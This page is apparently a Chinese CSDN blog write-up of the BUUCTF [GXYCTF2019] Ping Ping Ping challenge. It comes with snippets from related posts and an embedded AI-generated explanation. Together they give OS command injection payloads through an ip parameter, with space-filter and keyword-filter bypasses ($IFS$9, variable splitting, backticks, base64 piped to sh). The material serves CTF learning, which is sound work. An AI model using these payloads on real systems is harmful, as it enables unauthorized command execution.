buuctf [GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-11-26 20:20:29 发布
最新推荐文章于 2024-11-26 20:20:29 发布
阅读量873 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SopRomeo/article/details/104882465
版权

在这里插入图片描述
进去就要我们ping ip ,看看能不能命令执行 ?ip=127.0.01;ls发现可行
看到有flag ,不能cat,可远观而不可亵玩呼!

百度了命令执行绕过方法

试了很久,个人觉得这题有bug

a=ag.php;b=fl;c=cat;$c$b$a

如果把ag.php放后面就不行…


a=cat;b=fl;c=ag.php;$a$b$c

flag在源代码里

BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1337
BUUctf [GXYCTF2019]Ping Ping Ping
buuctf_web PINGPINGPING
最新发布
2401_87508420的博客
04-02 393
【代码】buuctf_web PINGPINGPING
BUUCTFPing Ping Ping
金 帛的博客
02-20 7494
BUUCTFWP,关于一些waf的绕过
BUUCTF:[GXYCTF2019]Ping Ping Ping
末初 - mochu7
10-20 2091
题目地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping ?ip=明显存在命令执行注入,使用;或者|闭合上一条命令 经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号 空格绕过这里使用$IFS$9 /?ip=;id;whoami;pwd;ls;ls$IFS$9-lha 我做题时用的是 /?ip=;cat$IFS$9`ls` 直接将当前目录下所有文件全部cat出来,查看源码发现flag 题.
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 1040
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5453
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 348
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 691
本题主要阴间在绕过字符和变量的运用细节上。
[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配,空格过滤)
2301_79326813的博客
01-31 1572
先看网页按照正常流程,先ip+ls,可以看到flag但是不能直接得flag,他应该是过滤掉了一点东西。这里考虑过滤掉了空格。
BUUCTFPing Ping Ping (命令执行绕过总结)
徐徐徐的博客
09-05 1087
{IFS}${IFS}$9 //这里$1到$9都可以$IFS$1 //这里$1到$9都可以{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来%20 (space) //在shell中无法直接使用%20代替空格,但是在URL编码中可以尝试,tab同理%09 (tab)$X // \x09表示tab,也可以用\x20$X。
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 545
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
BUUCTF——ping ping ping
weixin_62248541的博客
11-28 600
BUUCTF——ping ping ping
BUUCTFping ping ping
m0_54993799的博客
12-19 914
可以看到并没有绕过对flag关键字的过滤;换成index,没有对index.php进行过滤但也没有出现内容。直接查看flag.php,但不允许。$IFS$9可以绕过 ,但是又出现了新的问题,过滤了 flag。使用反引号``(优先级高的特性),查看 flag.php。用 ls 查看文件可执行,确定系统为Linux系统。同时,从返回结果看,我们要找的flag文件就在眼前。除了执行查询IP的结果,还有一些PHP代码。发现有flag的内容但不直接显示在页面上。开启靶机 =》 访问靶机链接。${IFS} 也被禁了。
buuctf-[GXYCTF2019]Ping Ping Ping1
mylovehx的博客
11-26 309
1. 用$IFS绕过空格过滤2. 用赋值的方式绕过关键词过滤127.0.0.1;a=g;3.用反引号绕过关键词过滤127.0.0.1;
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6528
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
buuctf-Ping Ping Ping
xixihahawuwu的博客
11-23 815
看着界面,是一道命令执行题 构造payload Ls查询下 空格被过滤了 $IFSKaTeX parse error: Expected 'EOF', got '#' at position 67: …23162235934.png#̲pic_center) Fla…IFS1Y2F0IGZsYWcucGhw∣base641Y2F0IGZsYWcucGhw|base641Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh ...
BUUCTF WEB [GXYCTF2019]Ping Ping Ping
Y1da的博客
04-10 1535
BUUCTF WEB [GXYCTF2019]Ping Ping Ping 进入题目后根据提示提交?ip=127.0.0.1尝试 回显PING 127.0.0.1 (127.0.0.1): 56 data bytes 判断存在命令执行漏洞,尝试提交?ip=127.0.0.1;ls 回显 PING 127.0.0.1 (127.0.0.1): 56 data bytes flag.php index.php 尝试访问index.php?ip=127.0.0.1;cat index.php 回显f
BUUCTF-Web:[GXYCTF2019]Ping Ping Ping
m0_56161093的博客
04-26 2204
题目 解题过程 1、题目页面提示?ip=,猜测是让我们把这个当做变量上传参数,由此猜想是命令注入 2、用管道符加上linux常用命令ls(windwos可以尝试dir)试试 所谓管道符(linux)的解释与用法如下: 尝试命令: ?ip=127.0.0.1;ls 看到flag.php,那就使用cat flag.php命令尝试读取 ?ip=127.0.0.1;cat flag.php 被过滤了空格,过滤空格的方法如下: $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 &l
buuctf web ping
03-25
<think>好的,用户想参与BUUCTF的Web类Ping相关挑战,我需要根据提供的引用资料来整理回答。首先,用户提到的三个引用都是关于[GXYCTF2019]Ping Ping Ping这道题目的,所以需要围绕这个题目展开分析。 首先,题目中的参数ip存在命令执行漏洞,用户输入的内容会被当作系统命令执行。比如输入/?ip=127.0.0.1会执行ping命令。但用户的目标是读取flag.php文件,所以需要绕过一些过滤机制。 引用3中提到,尝试用管道符执行命令时,发现空格被过滤,于是用$IFS$1绕过。接着尝试cat flag.php时,发现flag被过滤,于是使用通配符*来绕过,比如fla*,但发现*也被过滤。于是改用base64编码的方式,将命令编码后通过管道传递给sh执行。 在回答中,需要分步骤说明解题思路,比如参数注入、绕过空格过滤、绕过flag关键词过滤以及base64绕过的方法。同时,要结合引用中的具体例子,如使用$IFS$1代替空格,用base64编码payload等。 另外,用户可能需要知道常见的命令执行绕过技巧,比如符号替换、变量拼接、编码等,这些在CTF中很常见。需要确保回答结构清晰,每一步都有对应的解决方法,并引用提供的资料作为支持。 最后,生成的相关问题要围绕题目中的知识点,比如命令执行漏洞、绕过过滤的技巧、其他可能的绕过方式等,帮助用户深入理解并解决类似问题。</think>### BUUCTF Web类Ping操作挑战解析:以[GXYCTF2019]Ping Ping Ping为例 #### 1. **漏洞定位与参数注入** 题目通过`ip`参数接收用户输入,并直接拼接到系统命令`ping`中执行。例如输入`/?ip=127.0.0.1`会触发命令`ping -c 3 127.0.0.1`。通过分号`;`可实现多命令注入,例如`/?ip=127.0.0.1;ls`会先执行`ping`再列出目录文件[^3]。 #### 2. **绕过空格过滤** 当尝试读取`flag.php`时(`/?ip=127.0.0.1;cat flag.php`),发现空格被过滤。此时可用以下方法绕过: - **符号替换**:使用`$IFS$1`(内部字段分隔符)代替空格,如`cat$IFS$1flag.php` - **其他方法**:`{cat,flag.php}`或`%09`(Tab的URL编码)等(但本题中`%09`可能被过滤) #### 3. **绕过"flag"关键词过滤** 当直接使用`flag`字符串时会被拦截,可采用: - **通配符绕过**:`fla*`匹配文件名,如`cat$IFS$1fla*`(但题目中`*`也被过滤) - **编码绕过**:将命令`cat flag.php`进行Base64编码得到`Y2F0IGZsYWcucGhwCg==`,再通过管道执行: ```bash echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d|sh ``` 该命令将解码后的字符串通过`sh`执行,成功读取flag。 #### 4. **防御措施与拓展思路** - **过滤绕过技巧**:还可尝试`变量拼接`(如`fl=ag;cat$IFS$1$fl.php`)、`转义字符`(`fl\ag`)等方式 - **防御建议**:服务端应对用户输入进行白名单校验,禁用特殊字符如`;`、`$`、`|`等,并对关键函数进行过滤 $$ \text{Base64编码公式:} \text{Encoded} = \text{Base64Encode}(\text{OriginalCmd}) $$
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值